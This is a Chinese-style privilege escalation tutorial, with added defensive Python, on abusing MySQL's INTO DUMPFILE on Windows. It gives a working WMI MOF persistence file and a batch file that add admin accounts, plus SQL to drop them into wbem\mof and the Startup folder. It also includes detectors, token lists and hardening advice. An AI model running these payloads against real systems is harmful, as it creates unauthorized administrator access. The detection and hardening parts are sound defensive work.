Privilege escalation: a brief overview of MySQL MOF privilege escalation and startup-item privilege escalation

How the MOF technique is used

Save the following code as a .mof file:

#pragma namespace("\\\\.\\root\\subscription") 

instance of __EventFilter as $EventFilter 
{ 
    EventNamespace = "Root\\Cimv2"; 
    Name  = "filtP2"; 
    Query = "Select * From __InstanceModificationEvent " 
            "Where TargetInstance Isa \"Win32_LocalTime\" " 
            "And TargetInstance.Second = 5"; 
    QueryLanguage = "WQL"; 
}; 

instance of ActiveScriptEventConsumer as $Consumer 
{ 
    Name = "consPCSV2"; 
    ScriptingEngine = "JScript"; 
    ScriptText = 
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")"; 
}; 

instance of __FilterToConsumerBinding 
{ 
    Consumer   = $Consumer; 
    Filter = $EventFilter; 
}; 
Run the statement below in MySQL; the query writes the file into the target directory:

select load_file('<path to the .mof file>') into dumpfile 'c:/windows/system32/wbem/mof/<your file name>.mof';

Once the import succeeds, the system runs the file automatically.
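What makes the dropped file run is the WMI permanent event subscription it declares: an __EventFilter (the trigger, here a WQL query that fires once a minute), an ActiveScriptEventConsumer (the JScript to execute) and a __FilterToConsumerBinding that joins them. Only Windows XP/Server 2003 era hosts auto-compile files placed in wbem\mof, but the same three objects, however they got into root\subscription, are the thing a defender looks for. The Python below is an added example, not code from the page: it parses the `instance of Class [as $alias] { ... };` syntax shown above, resolves each binding back to its filter and consumer, and reports every consumer that runs script or command lines together with the indicators found in its payload. The sample MOF inside it is constructed for the test and modelled on the page's file with the names changed.

```python
import re

# Event-consumer classes that execute code when their bound filter fires.
CONSUMER_CLASSES = {"ActiveScriptEventConsumer", "CommandLineEventConsumer"}
# Payload substrings worth flagging; "WScript.Shell" and "net.exe" are what the page's MOF uses.
SUSPICIOUS_TOKENS = ("WScript.Shell", "net.exe", "net user", "cmd.exe", "powershell")
INSTANCE_HDR = re.compile(r"instance\s+of\s+(\w+)(?:\s+as\s+\$(\w+))?\s*\{")
PROP_HDR = re.compile(r"\s*(\w+)\s*=\s*")


def _scan_until(text, start, stop):
    """Index of the first `stop` char at/after `start` that is outside a double-quoted
    string and outside nested braces, so ';' or '}' inside ScriptText cannot end a value."""
    depth, in_str, i = 0, False, start
    while i < len(text):
        c = text[i]
        if in_str:
            if c == "\\":
                i += 1                       # skip the escaped character
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
        elif c == "{":
            depth += 1
        elif c == "}" and depth > 0:
            depth -= 1
        elif c == stop and depth == 0:
            return i
        i += 1
    return -1


def _parse_props(body):
    """Split an instance body into {property: raw value} (values keep their quotes)."""
    props, i = {}, 0
    while (m := PROP_HDR.match(body, i)) and (end := _scan_until(body, m.end(), ";")) >= 0:
        props[m.group(1)] = body[m.end():end].strip()
        i = end + 1
    return props


def parse_mof(text):
    """Return [(class, alias, props), ...] for each `instance of Class [as $alias] {...};`."""
    out, pos = [], 0
    while (m := INSTANCE_HDR.search(text, pos)) and (end := _scan_until(text, m.end(), "}")) >= 0:
        out.append((m.group(1), m.group(2), _parse_props(text[m.end():end])))
        pos = end + 1
    return out


def _unquote(value):
    """Join adjacent MOF string literals ("a" "b") and resolve backslash escapes."""
    parts = re.findall(r'"((?:[^"\\]|\\.)*)"', value)
    if not parts:
        return value                         # e.g. an alias reference such as $Cons
    esc = {"n": "\n", "t": "\t"}
    return "".join(re.sub(r"\\(.)", lambda m: esc.get(m[1], m[1]), p) for p in parts)


def find_persistence(instances):
    """Resolve each __FilterToConsumerBinding; report those bound to a code-running consumer."""
    by_alias = {alias: (cls, props) for cls, alias, props in instances if alias}
    findings = []
    for cls, _, props in instances:
        if cls != "__FilterToConsumerBinding":
            continue
        cons = by_alias.get(props.get("Consumer", "").lstrip("$"))
        filt = by_alias.get(props.get("Filter", "").lstrip("$"))
        if not cons or cons[0] not in CONSUMER_CLASSES:
            continue
        payload = _unquote(cons[1].get("ScriptText") or cons[1].get("CommandLineTemplate") or "")
        findings.append({
            "consumer_class": cons[0],
            "consumer_name": _unquote(cons[1].get("Name", "")),
            "filter_name": _unquote(filt[1].get("Name", "")) if filt else None,
            "trigger": _unquote(filt[1].get("Query", "")) if filt else None,
            "payload": payload,
            "indicators": [t for t in SUSPICIOUS_TOKENS if t.lower() in payload.lower()],
        })
    return findings


# Constructed sample modelled on the page's MOF (names changed); not a real capture.
SAMPLE_MOF = r'''#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $Filt
{
    EventNamespace = "Root\\Cimv2"; Name = "sample_filter"; QueryLanguage = "WQL";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" And TargetInstance.Second = 5";
};
instance of ActiveScriptEventConsumer as $Cons
{
    Name = "sample_consumer"; ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\");\nWSH.run(\"net.exe user x y /add\")";
};
instance of __FilterToConsumerBinding { Consumer = $Cons; Filter = $Filt; };
'''
```

`find_persistence(parse_mof(SAMPLE_MOF))` yields one finding whose trigger is the once-a-minute Win32_LocalTime query and whose indicators are WScript.Shell and net.exe. The parser only resolves `$alias` references, which is the form the page uses; bindings written as full object paths are not followed. On a live host the same objects are listed with `Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding` (and the __EventFilter and __EventConsumer classes), and Sysmon records their creation as event IDs 19, 20 and 21, so an alert on any new binding in root\subscription catches this regardless of how the MOF was delivered.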

Startup-item privilege escalation

@echo
net user dodo dodo /add
Save the code as a .bat file.

Write the file into place with a query:

select load_file('<path to the .bat file>') into dumpfile '<the system's startup folder>';

It takes effect the next time the system restarts.
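Both techniques on this page rest on the same MySQL precondition: the account holds the global FILE privilege, and secure_file_priv does not stop `INTO DUMPFILE` from writing into a directory Windows executes from, using whatever filesystem rights the mysqld service account has. The Python below is an added example, not code from the page. It rates that exposure from the values a DBA gets back from `SHOW VARIABLES LIKE 'secure_file_priv'` and `SHOW GRANTS`, and scans general-log style lines (constructed here, not real captures) for file writes aimed at the two drop targets the page uses, wbem\mof and the Start Menu Startup folder.

```python
import re

# Windows directories where a file written by mysqld runs without further interaction:
# the WMI MOF auto-compile directory and the Start Menu startup folders (the two drop
# targets this page describes). Paths are compared after lower-casing and '/' -> '\'.
AUTORUN_DIR_MARKERS = ("\\wbem\\mof\\", "\\programs\\startup\\")

# Matches the file-write clause of SELECT ... INTO DUMPFILE / INTO OUTFILE.
FILE_WRITE_RE = re.compile(r"into\s+(dumpfile|outfile)\s+'([^']*)'", re.IGNORECASE)


def classify_secure_file_priv(value):
    """Interpret secure_file_priv as SHOW VARIABLES reports it: NULL disables file
    import/export, '' allows any path the service account can write, anything else
    confines LOAD_FILE / INTO DUMPFILE to that directory."""
    if value is None or value.strip().upper() == "NULL":
        return "disabled"
    if value.strip() == "":
        return "unrestricted"
    return "restricted"


def grant_has_file(grant_rows):
    """True if any SHOW GRANTS row confers FILE, explicitly or via ALL [PRIVILEGES].
    FILE is a global privilege, so only ON *.* rows can carry it."""
    for row in grant_rows:
        m = re.match(r"GRANT\s+(.+?)\s+ON\s+\*\.\*", row, re.IGNORECASE)
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group(1).split(",")}
        if privs & {"FILE", "ALL", "ALL PRIVILEGES"}:
            return True
    return False


def assess_exposure(secure_file_priv, grant_rows):
    """Combine both controls into a rating for arbitrary file writes by this account."""
    mode = classify_secure_file_priv(secure_file_priv)
    has_file = grant_has_file(grant_rows)
    if mode == "disabled" or not has_file:
        risk = "low"        # either control alone refuses INTO DUMPFILE
    elif mode == "unrestricted":
        risk = "high"       # writes land wherever the mysqld service account may write
    else:
        risk = "medium"     # confined to the upload directory; still review FILE grants
    return {"secure_file_priv": mode, "file_privilege": has_file, "risk": risk}


def flag_autorun_file_writes(log_lines):
    """Return general-log lines whose INTO DUMPFILE/OUTFILE target is an auto-run directory."""
    hits = []
    for line in log_lines:
        m = FILE_WRITE_RE.search(line)
        if not m:
            continue
        target = m.group(2)
        norm = target.replace("/", "\\").lower()
        if any(marker in norm for marker in AUTORUN_DIR_MARKERS):
            hits.append({"clause": m.group(1).upper(), "path": target, "line": line.strip()})
    return hits


# Constructed general-log lines in the MySQL 5.7+ layout (timestamp, thread id, command, text).
SAMPLE_GENERAL_LOG = [
    "2024-01-01T10:00:00.000000Z\t   12 Query\tselect load_file('C:/tmp/x.mof') "
    "into dumpfile 'c:/windows/system32/wbem/mof/x.mof'",
    "2024-01-01T10:00:05.000000Z\t   12 Query\tselect * into outfile "
    "'C:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup/x.bat' from t",
    "2024-01-01T10:00:09.000000Z\t   13 Query\tselect * from t into outfile '/var/lib/mysql-files/report.csv'",
    "2024-01-01T10:00:10.000000Z\t   13 Query\tselect 1",
]

if __name__ == "__main__":
    print(assess_exposure("", ["GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost'"]))
    for hit in flag_autorun_file_writes(SAMPLE_GENERAL_LOG):
        print(hit["clause"], "->", hit["path"])
```

Setting `secure_file_priv=NULL` under `[mysqld]` in my.ini refuses both LOAD_FILE and INTO DUMPFILE outright and is the simplest fix; where an upload directory is needed, point the variable at a dedicated folder and revoke FILE (`REVOKE FILE ON *.* FROM ...`) from application accounts. Running mysqld as a dedicated low-privilege service account rather than LocalSystem removes the other half of the problem, since the write into system32 or the all-users Startup folder then fails at the filesystem. Note that `load_file()` returns NULL instead of raising an error when secure_file_priv forbids the source path, so audit the server variables rather than relying on query failures.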
